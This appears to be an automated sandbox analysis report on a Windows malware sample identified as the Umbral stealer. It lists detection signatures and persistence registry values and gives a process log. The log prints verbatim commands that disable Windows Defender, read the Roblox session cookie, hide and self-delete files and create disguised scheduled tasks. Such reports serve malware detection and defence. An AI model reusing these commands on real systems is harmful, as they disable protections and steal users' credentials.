Analysis Overview
SHA256
a3b28c9c105887943acef8ae6e70bb79a3db83a7bcdd4307bde10e72c3394268
Threat Level: Known bad
The file SolaroB.exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Modifies WinLogon for persistence
Umbral
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Event Triggered Execution: AppInit DLLs
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Suspicious use of SetWindowsHookEx
Runs ping.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Checks processor information in registry
Views/modifies file attributes
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-18 10:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 10:28
Reported
2024-06-18 10:30
Platform
win7-20240611-en
Max time kernel
150s
Max time network
142s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Documents\\xdwdDiscord.exe" | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Event Triggered Execution: AppInit DLLs
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Program Files\\xdwdSkype.exe" | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\xdwdSkype.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| File opened for modification | C:\Program Files\xdwdSkype.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\xdwd.dll | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3056 -s 608
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
